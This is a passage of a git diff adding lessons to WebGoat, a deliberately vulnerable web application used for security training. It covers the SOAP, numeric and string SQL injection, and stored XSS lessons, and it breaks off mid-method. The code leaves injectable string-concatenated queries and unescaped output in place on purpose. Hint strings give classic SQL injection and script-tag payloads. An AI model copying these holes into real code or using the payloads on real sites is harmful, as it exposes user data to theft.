+	ElementContainer ec = new ElementContainer();
+
+	// Determine how many methods have been accessed. User needs to check at least two methods
+	// before completing the lesson.
+	if ((accessFirstName + accessLastName + accessCreditCard + accessLoginCount) >= 2)
+	{
+	    /** Reset function access counters **/
+	    accessFirstName = accessLastName = accessCreditCard = accessLoginCount = 0;
+	    //SoapRequest.completed = true;
+	    makeSuccess(s);
+	}
+	else
+	{
+
+	    // display Stage2 content
+	    ec
+		    .addElement(new P()
+			    .addElement("Intercept the request and invoke any method by sending a valid SOAP request for a valid account. <br>"));
+	    Element b = ECSFactory
+		    .makeButton("Press to generate an HTTP request");
+	    ec.addElement(b);
+
+	    // conditionally display invoked methods
+	    if ((accessFirstName + accessLastName + accessCreditCard + accessLoginCount) > 0)
+	    {
+		ec.addElement("<br><br>Methods Invoked:<br>");
+		ec.addElement("<ul>");
+		if (accessFirstName > 0)
+		{
+		    ec.addElement("<li>getFirstName</li>");
+		}
+		if (accessLastName > 0)
+		{
+		    ec.addElement("<li>getLastName</li>");
+		}
+		if (accessCreditCard > 0)
+		{
+		    ec.addElement("<li>getCreditCard</li>");
+		}
+		if (accessLoginCount > 0)
+		{
+		    ec.addElement("<li>getLoginCount</li>");
+		}
+		ec.addElement("</ul>");
+	    }
+
+	    A a = new A("services/SoapRequest?WSDL", "WebGoat WSDL File");
+	    ec.addElement(new BR());
+	    ec.addElement(a);
+}
+
+	//getLessonTracker( s ).setCompleted( SoapRequest.completed );
+	return (ec);
+    }
+
+
+    public String getResults(int id, String field)
+    {
+	try
+	{
+	    Connection connection = DatabaseUtilities.getConnection("guest", getWebgoatContext());
+	    PreparedStatement ps = connection
+		    .prepareStatement("SELECT * FROM user_data WHERE userid = ?");
+	    ps.setInt(1, id);
+	    try
+	    {
+		ResultSet results = ps.executeQuery();
+		if ((results != null) && (results.next() == true))
+		{
+		    return results.getString(field);
+		}
+	    }
+	    catch (SQLException sqle)
+	    {}
+	}
+	catch (Exception e)
+	{}
+	return null;
+    }
+
+
+    public String getCreditCard(int id)
+    {
+	String result = getResults(id, "cc_number");
+	//SoapRequest.completed = true;
+
+	if (result != null)
+	{
+	    //DEVNOTE: Always set method access counter to (1) no matter how many times it is accessed.
+	    // This is intended to be used to determine how many methods have been accessed, not how often.
+	    accessCreditCard = 1;
+	    return result;
+	}
+	return null;
+    }
+
+
+    public String getFirstName(int id)
+    {
+	String result = getResults(id, "first_name");
+	if (result != null)
+	{
+	    //DEVNOTE: Always set method access counter to (1) no matter how many times it is accessed.
+	    // This is intended to be used to determine how many methods have been accessed, not how often.
+	    accessFirstName = 1;
+	    return result;
+	}
+	return null;
+    }
+
+
+    public String getLastName(int id)
+    {
+	String result = getResults(id, "last_name");
+	if (result != null)
+	{
+	    //DEVNOTE: Always set method access counter to (1) no matter how many times it is accessed.
+	    // This is intended to be used to determine how many methods have been accessed, not how often.
+	    accessLastName = 1;
+	    return result;
+	}
+	return null;
+    }
+
+
+    public String getLoginCount(int id)
+    {
+	String result = getResults(id, "login_count");
+	if (result != null)
+	{
+	    //DEVNOTE: Always set method access counter to (1) no matter how many times it is accessed.
+	    // This is intended to be used to determine how many methods have been accessed, not how often.
+	    accessLoginCount = 1;
+	    return result;
+	}
+	return null;
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SqlNumericInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SqlNumericInjection.java
new file mode 100644
index 000000000..d4d7de0f8
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SqlNumericInjection.java
@@ -0,0 +1,388 @@
+package org.owasp.webgoat.lessons;
+
+import java.sql.Connection;
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.ResultSetMetaData;
+import java.sql.SQLException;
+import java.sql.Statement;
+import java.util.ArrayList;
+import java.util.Iterator;
+import java.util.List;
+import java.util.Map;
+import java.util.TreeMap;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.Option;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.PRE;
+import org.apache.ecs.html.Select;
+import org.owasp.webgoat.session.DatabaseUtilities;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created    October 28, 2003
+ */
+public class SqlNumericInjection extends SequentialLessonAdapter
+{
+    private final static String STATION_ID = "station";
+
+    private String station;
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+
+    protected Element createContent(WebSession s)
+    {
+	return super.createStagedContent(s);
+    }
+
+
+    protected Element doStage1(WebSession s) throws Exception
+    {
+	return injectableQuery(s);
+    }
+
+
+    protected Element doStage2(WebSession s) throws Exception
+    {
+	return parameterizedQuery(s);
+    }
+
+
+    protected Element injectableQuery(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	try
+	{
+
+	    ec.addElement(makeStationList(s));
+
+	    String query;
+
+	    station = s.getParser().getRawParameter(STATION_ID, null);
+
+	    if (station == null)
+	    {
+		query = "SELECT * FROM weather_data WHERE station = [station]";
+	    }
+	    else
+	    {
+		query = "SELECT * FROM weather_data WHERE station = " + station;
+	    }
+
+	    ec.addElement(new PRE(query));
+
+	    if (station == null)
+		return ec;
+
+		Connection connection = DatabaseUtilities.getConnection(s);
+
+	    try
+	    {
+		Statement statement = connection.createStatement(
+			ResultSet.TYPE_SCROLL_INSENSITIVE,
+			ResultSet.CONCUR_READ_ONLY);
+		ResultSet results = statement.executeQuery(query);
+
+		if ((results != null) && (results.first() == true))
+		{
+		    ResultSetMetaData resultsMetaData = results.getMetaData();
+		    ec.addElement(DatabaseUtilities.writeTable(results,
+			    resultsMetaData));
+		    results.last();
+
+		    // If they get back more than one row they succeeded
+		    if (results.getRow() > 1)
+		    {
+			makeSuccess(s);
+			getLessonTracker(s).setStage(2);
+			s
+				.setMessage("Start this lesson over to attack a parameterized query.");
+		    }
+		}
+		else
+		{
+		    ec.addElement("No results matched.  Try Again.");
+		}
+
+	    }
+	    catch (SQLException sqle)
+	    {
+		ec.addElement(new P().addElement(sqle.getMessage()));
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	return (ec);
+    }
+
+
+    protected Element parameterizedQuery(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	ec
+		.addElement("Now that you have successfully performed an SQL injection, try the same "
+			+ " type of attack on a parameterized query.");
+	//		if ( s.getParser().getRawParameter( ACCT_NUM, "101" ).equals("restart"))
+	//		{
+	//			getLessonTracker(s).setStage(1);
+	//			return( injectableQuery(s));
+	//		}
+
+	ec.addElement(new BR());
+
+	try
+	{
+		Connection connection = DatabaseUtilities.getConnection(s);
+
+	    ec.addElement(makeStationList(s));
+
+	    String query = "SELECT * FROM weather_data WHERE station = ?";
+
+	    station = s.getParser().getRawParameter(STATION_ID, null);
+
+	    ec.addElement(new PRE(query));
+
+	    if (station == null)
+		return ec;
+
+	    try
+	    {
+		PreparedStatement statement = connection.prepareStatement(
+			query, ResultSet.TYPE_SCROLL_INSENSITIVE,
+			ResultSet.CONCUR_READ_ONLY);
+		statement.setInt(1, Integer.parseInt(station));
+		ResultSet results = statement.executeQuery();
+
+		if ((results != null) && (results.first() == true))
+		{
+		    ResultSetMetaData resultsMetaData = results.getMetaData();
+		    ec.addElement(DatabaseUtilities.writeTable(results,
+			    resultsMetaData));
+		    results.last();
+
+		    // If they get back more than one row they succeeded
+		    if (results.getRow() > 1)
+		    {
+			makeSuccess(s);
+		    }
+		}
+		else
+		{
+		    ec.addElement("No results matched.  Try Again.");
+		}
+	    }
+	    catch (SQLException sqle)
+	    {
+		ec.addElement(new P().addElement(sqle.getMessage()));
+	    }
+	    catch (NumberFormatException npe)
+	    {
+		ec.addElement(new P()
+			.addElement("Error parsing station as a number: "
+				+ npe.getMessage()));
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	return (ec);
+    }
+
+
+    protected Element makeStationList(WebSession s) throws SQLException,
+	    ClassNotFoundException
+    {
+	ElementContainer ec = new ElementContainer();
+
+	ec
+		.addElement(new P()
+			.addElement("Select your local weather station: "));
+
+	Map stations = getStations(s);
+	Select select = new Select(STATION_ID);
+	Iterator it = stations.keySet().iterator();
+	while (it.hasNext())
+	{
+	    String key = (String) it.next();
+	    select.addElement(new Option(key).addElement((String) stations
+		    .get(key)));
+	}
+	ec.addElement(select);
+	ec.addElement(new P());
+
+	Element b = ECSFactory.makeButton("Go!");
+	ec.addElement(b);
+
+	return ec;
+    }
+
+
+    /**
+     *  Gets the stations from the db
+     *
+     * @return    A map containing each station, indexed by station number
+     */
+    protected Map getStations(WebSession s) throws SQLException,
+	    ClassNotFoundException
+    {
+
+    Connection connection = DatabaseUtilities.getConnection(s);
+
+	Map<String, String> stations = new TreeMap<String, String>();
+	String query = "SELECT DISTINCT station, name FROM WEATHER_DATA";
+
+	try
+	{
+	    Statement statement = connection.createStatement(
+		    ResultSet.TYPE_SCROLL_INSENSITIVE,
+		    ResultSet.CONCUR_READ_ONLY);
+	    ResultSet results = statement.executeQuery(query);
+
+	    if ((results != null) && (results.first() == true))
+	    {
+		results.beforeFirst();
+
+		while (results.next())
+		{
+		    String station = results.getString("station");
+		    String name = results.getString("name");
+
+		    //<START_OMIT_SOURCE>
+		    if (!station.equals("10001") && !station.equals("11001"))
+		    {
+			stations.put(station, name);
+		    }
+		    //<END_OMIT_SOURCE>
+		}
+
+		results.close();
+	    }
+	}
+	catch (SQLException sqle)
+	{
+	    sqle.printStackTrace();
+	}
+
+	return stations;
+    }
+
+
+    /**
+     *  Gets the category attribute of the SqNumericInjection object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+	return Category.INJECTION;
+    }
+
+
+    /**
+     *  Gets the hints attribute of the DatabaseFieldScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints
+		.add("The application is taking your input and inserting it at the end of a pre-formed SQL command.");
+	hints
+		.add("This is the code for the query being built and issued by WebGoat:<br><br> "
+			+ "\"SELECT * FROM weather_data WHERE station = \" + station ");
+	hints
+		.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. "
+			+ "Try appending a SQL statement that always resolves to true.");
+	hints.add("Try entering [ 101 OR 1 = 1 ].");
+
+	return hints;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(70);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the DatabaseFieldScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Numeric SQL Injection");
+    }
+
+
+    /**
+     *  Constructor for the DatabaseFieldScreen object
+     *
+     * @param  s  Description of the Parameter
+     */
+    public void handleRequest(WebSession s)
+    {
+	try
+	{
+	    super.handleRequest(s);
+	}
+	catch (Exception e)
+	{
+	    System.out.println("Exception caught: " + e);
+	    e.printStackTrace(System.out);
+	}
+    }
+    
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SqlStringInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SqlStringInjection.java
new file mode 100644
index 000000000..06a944cbf
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SqlStringInjection.java
@@ -0,0 +1,308 @@
+package org.owasp.webgoat.lessons;
+
+import java.sql.Connection;
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.ResultSetMetaData;
+import java.sql.SQLException;
+import java.sql.Statement;
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.PRE;
+import org.owasp.webgoat.session.DatabaseUtilities;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created    October 28, 2003
+ */
+public class SqlStringInjection extends SequentialLessonAdapter
+{
+    private final static String ACCT_NAME = "account_name";
+
+    private static String STAGE = "stage";
+
+    private String accountName;
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	return super.createStagedContent(s);
+    }
+
+
+    protected Element doStage1(WebSession s) throws Exception
+    {
+	return injectableQuery(s);
+    }
+
+
+    protected Element doStage2(WebSession s) throws Exception
+    {
+	return parameterizedQuery(s);
+    }
+
+
+    protected Element injectableQuery(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	try
+	{
+		Connection connection = DatabaseUtilities.getConnection(s);
+
+	    ec.addElement(makeAccountLine(s));
+
+	    String query = "SELECT * FROM user_data WHERE last_name = '"
+		    + accountName + "'";
+	    ec.addElement(new PRE(query));
+
+	    try
+	    {
+		Statement statement = connection.createStatement(
+			ResultSet.TYPE_SCROLL_INSENSITIVE,
+			ResultSet.CONCUR_READ_ONLY);
+		ResultSet results = statement.executeQuery(query);
+
+		if ((results != null) && (results.first() == true))
+		{
+		    ResultSetMetaData resultsMetaData = results.getMetaData();
+		    ec.addElement(DatabaseUtilities.writeTable(results,
+			    resultsMetaData));
+		    results.last();
+
+		    // If they get back more than one user they succeeded
+		    if (results.getRow() >= 6)
+		    {
+			makeSuccess(s);
+			getLessonTracker(s).setStage(2);
+
+			StringBuffer msg = new StringBuffer();
+
+			msg.append("Bet you can't do it again! ");
+			msg
+				.append("This lesson has detected your successfull attack ");
+			msg.append("and has now switched to a defensive mode. ");
+			msg
+				.append("Try again to attack a parameterized query.");
+
+			s.setMessage(msg.toString());
+		    }
+		}
+		else
+		{
+		    ec.addElement("No results matched.  Try Again.");
+		}
+	    }
+	    catch (SQLException sqle)
+	    {
+		ec.addElement(new P().addElement(sqle.getMessage()));
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	return (ec);
+    }
+
+
+    protected Element parameterizedQuery(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	ec
+		.addElement("Now that you have successfully performed an SQL injection, try the same "
+			+ " type of attack on a parameterized query.  Restart the lesson if you wish "
+			+ " to return to the injectable query");
+	if (s.getParser().getRawParameter(ACCT_NAME, "YOUR_NAME").equals(
+		"restart"))
+	{
+	    getLessonTracker(s).getLessonProperties().setProperty(STAGE, "1");
+	    return (injectableQuery(s));
+	}
+
+	ec.addElement(new BR());
+
+	try
+	{
+		Connection connection = DatabaseUtilities.getConnection(s);
+
+	    ec.addElement(makeAccountLine(s));
+
+	    String query = "SELECT * FROM user_data WHERE last_name = ?";
+	    ec.addElement(new PRE(query));
+
+	    try
+	    {
+		PreparedStatement statement = connection.prepareStatement(
+			query, ResultSet.TYPE_SCROLL_INSENSITIVE,
+			ResultSet.CONCUR_READ_ONLY);
+		statement.setString(1, accountName);
+		ResultSet results = statement.executeQuery();
+
+		if ((results != null) && (results.first() == true))
+		{
+		    ResultSetMetaData resultsMetaData = results.getMetaData();
+		    ec.addElement(DatabaseUtilities.writeTable(results,
+			    resultsMetaData));
+		    results.last();
+
+		    // If they get back more than one user they succeeded
+		    if (results.getRow() >= 6)
+		    {
+			makeSuccess(s);
+		    }
+		}
+		else
+		{
+		    ec.addElement("No results matched.  Try Again.");
+		}
+	    }
+	    catch (SQLException sqle)
+	    {
+		ec.addElement(new P().addElement(sqle.getMessage()));
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	return (ec);
+    }
+
+
+    protected Element makeAccountLine(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+	ec.addElement(new P().addElement("Enter your last name: "));
+
+	accountName = s.getParser().getRawParameter(ACCT_NAME, "Your Name");
+	Input input = new Input(Input.TEXT, ACCT_NAME, accountName.toString());
+	ec.addElement(input);
+
+	Element b = ECSFactory.makeButton("Go!");
+	ec.addElement(b);
+
+	return ec;
+
+    }
+
+
+    /**
+     *  Gets the category attribute of the SqNumericInjection object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+	return Category.INJECTION;
+    }
+
+
+    /**
+     *  Gets the hints attribute of the DatabaseFieldScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints
+		.add("The application is taking your input and inserting it at the end of a pre-formed SQL command.");
+	hints
+		.add("This is the code for the query being built and issued by WebGoat:<br><br> "
+			+ "\"SELECT * FROM user_data WHERE last_name = \" + accountName ");
+	hints
+		.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR."
+			+ "Try appending a SQL statement that always resolves to true");
+	hints.add("Try entering [ smith' OR '1' = '1 ].");
+
+	return hints;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(75);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the DatabaseFieldScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("String SQL Injection");
+    }
+
+
+    /**
+     *  Constructor for the DatabaseFieldScreen object
+     *
+     * @param  s  Description of the Parameter
+     */
+    public void handleRequest(WebSession s)
+    {
+	try
+	{
+	    super.handleRequest(s);
+	}
+	catch (Exception e)
+	{
+	    System.out.println("Exception caught: " + e);
+	    e.printStackTrace(System.out);
+	}
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/StoredXss.java b/main/project/JavaSource/org/owasp/webgoat/lessons/StoredXss.java
new file mode 100644
index 000000000..e67d3447c
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/StoredXss.java
@@ -0,0 +1,380 @@
+package org.owasp.webgoat.lessons;
+
+import java.sql.Connection;
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.Statement;
+import java.util.ArrayList;
+import java.util.List;
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.B;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.HR;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.apache.ecs.html.TextArea;
+import org.owasp.webgoat.session.*;
+import org.owasp.webgoat.util.HtmlEncoder;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created    October 28, 2003
+ */
+public class StoredXss extends LessonAdapter
+{
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+
+    private final static String MESSAGE = "message";
+
+    private final static int MESSAGE_COL = 3;
+
+    private final static String NUMBER = "Num";
+
+    private final static int NUM_COL = 1;
+
+    private final static String STANDARD_QUERY = "SELECT * FROM messages";
+
+    private final static String TITLE = "title";
+
+    private final static int TITLE_COL = 2;
+
+    private static int count = 1;
+
+    private final static int USER_COL = 4; // Added by Chuck Willis - used to show user who posted message
+
+
+    /**
+     *  Adds a feature to the Message attribute of the MessageBoardScreen object
+     *
+     * @param  s  The feature to be added to the Message attribute
+     */
+    protected void addMessage(WebSession s)
+    {
+	try
+	{
+	    String title = HtmlEncoder.encode(s.getParser().getRawParameter(
+		    TITLE, ""));
+	    String message = s.getParser().getRawParameter(MESSAGE, "");
+
+		Connection connection = DatabaseUtilities.getConnection(s);
+
+	    String query = "INSERT INTO messages VALUES (?, ?, ?, ? )";
+
+	    PreparedStatement statement = connection.prepareStatement(query,
+		    ResultSet.TYPE_SCROLL_INSENSITIVE,
+		    ResultSet.CONCUR_READ_ONLY);
+	    statement.setInt(1, count++);
+	    statement.setString(2, title);
+	    statement.setString(3, message);
+	    statement.setString(4, s.getUserName());
+	    statement.execute();
+	}
+	catch (Exception e)
+	{
+	    // ignore the empty resultset on the insert.  There are a few more SQL Injection errors
+	    // that could be trapped here but we will let them try.  One error would be something
+	    // like "Characters found after end of SQL statement." 
+	    if (e.getMessage().indexOf("No ResultSet was produced") == -1)
+	    {
+		s.setMessage("Could not add message to database");
+	    }
+	    e.printStackTrace();
+	}
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	addMessage(s);
+
+	ElementContainer ec = new ElementContainer();
+	ec.addElement(makeInput(s));
+	ec.addElement(new HR());
+	ec.addElement(makeCurrent(s));
+	ec.addElement(new HR());
+	ec.addElement(makeList(s));
+
+	return (ec);
+    }
+
+
+    /**
+     *  Gets the category attribute of the StoredXss object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+	return Category.XSS;
+    }
+
+
+    /**
+     *  Gets the hints attribute of the MessageBoardScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints.add("You can put HTML tags in your message.");
+	hints
+		.add("Bury a SCRIPT tag in the message to attack anyone who reads it.");
+	hints
+		.add("Enter this: &lt;script language=\"javascript\" type=\"text/javascript\"&gt;alert(\"Ha Ha Ha\");&lt;/script&gt; in the message field.");
+	hints
+		.add("Enter this: &lt;script&gtalert(\"document.cookie\");&lt;/script&gt; in the message field.");
+
+	return hints;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(100);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the MessageBoardScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Stored XSS Attacks");
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element makeCurrent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	try
+	{
+	    int messageNum = s.getParser().getIntParameter(NUMBER, 0);
+
+		Connection connection = DatabaseUtilities.getConnection(s);
+
+	    // edit by Chuck Willis - Added logic to associate similar usernames
+	    // The idea is that users chuck-1, chuck-2, etc will see each other's messages
+	    // but not anyone elses.  This allows users to try out XSS to grab another user's
+	    // cookies, but not get confused by other users scripts
+
+	    String query = "SELECT * FROM messages WHERE user_name LIKE ? and num = ?";
+	    PreparedStatement statement = connection.prepareStatement(query,
+		    ResultSet.TYPE_SCROLL_INSENSITIVE,
+		    ResultSet.CONCUR_READ_ONLY);
+	    statement.setString(1, getNameroot(s.getUserName()) + "%");
+	    statement.setInt(2, messageNum);
+	    ResultSet results = statement.executeQuery();
+
+	    if ((results != null) && results.first())
+	    {
+		ec.addElement(new H1("Message Contents For: "
+			+ results.getString(TITLE_COL)));
+		Table t = new Table(0).setCellSpacing(0).setCellPadding(0)
+			.setBorder(0);
+		TR row1 = new TR(new TD(new B(new StringElement("Title:"))));
+		row1.addElement(new TD(new StringElement(results
+			.getString(TITLE_COL))));
+		t.addElement(row1);
+
+		String messageData = results.getString(MESSAGE_COL);
+		TR row2 = new TR(new TD(new B(new StringElement("Message:"))));
+		row2.addElement(new TD(new StringElement(messageData)));
+		t.addElement(row2);
+
+		// Edited by Chuck Willis - added display of the user who posted the message, so that
+		// if users use a cross site request forgery or XSS to make another user post a message,
+		// they can see that the message is attributed to that user
+
+		TR row3 = new TR(new TD(new StringElement("Posted By:")));
+		row3.addElement(new TD(new StringElement(results
+			.getString(USER_COL))));
+		t.addElement(row3);
+
+		ec.addElement(t);
+
+		// Some sanity checks that the script may be correct
+		if (messageData.toLowerCase().indexOf("<script>") != -1
+			&& messageData.toLowerCase().indexOf("</script>") != -1
+			&& messageData.toLowerCase().indexOf("alert") != -1)
+		{
+		    makeSuccess(s);
+		}
+
+	    }
+	    else
+	    {
+		if (messageNum != 0)
+		{
+		    ec.addElement(new P().addElement("Could not find message "
+			    + messageNum));
+		}
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	return (ec);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element makeInput(WebSession s)
+    {
+	Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
+	TR row1 = new TR();
+	TR row2 = new TR();
+	row1.addElement(new TD(new StringElement("Title: ")));
+
+	Input inputTitle = new Input(Input.TEXT, TITLE, "");
+	row1.addElement(new TD(inputTitle));
+
+	TD item1 = new TD();
+	item1.setVAlign("TOP");
+	item1.addElement(new StringElement("Message: "));
+	row2.addElement(item1);
+
+	TD item2 = new TD();
+	TextArea ta = new TextArea(MESSAGE, 5, 60);
+	item2.addElement(ta);
+	row2.addElement(item2);
+	t.addElement(row1);
+	t.addElement(row2);
+
+	Element b = ECSFactory.makeButton("Submit");
+	ElementContainer ec = new ElementContainer();
+	ec.addElement(t);
+	ec.addElement(new P().addElement(b));
+
+	return (ec);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    public static Element makeList(WebSession s)
+    {
+	Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
+
+	try
+	{
+		Connection connection = DatabaseUtilities.getConnection(s);
+
+	    Statement statement = connection.createStatement(
+		    ResultSet.TYPE_SCROLL_INSENSITIVE,
+		    ResultSet.CONCUR_READ_ONLY);
+	    // edit by Chuck Willis - Added logic to associate similar usernames
+	    // The idea is that users chuck-1, chuck-2, etc will see each other's messages
+	    // but not anyone elses.  This allows users to try out XSS to grab another user's
+	    // cookies, but not get confused by other users scripts
+
+	    ResultSet results = statement.executeQuery(STANDARD_QUERY
+		    + " WHERE user_name LIKE '" + getNameroot(s.getUserName())
+		    + "%'");
+
+	    if ((results != null) && (results.first() == true))
+	    {
+		results.beforeFirst();
+
+		for (int i = 0; results.next(); i++)
+		{
+		    A a = ECSFactory.makeLink(results.getString(TITLE_COL),
+			    NUMBER, results.getInt(NUM_COL));
+		    TD td = new TD().addElement(a);
+		    TR tr = new TR().addElement(td);
+		    t.addElement(tr);
+		}
+	    }
+	}
+	catch (Exception e)
+	{
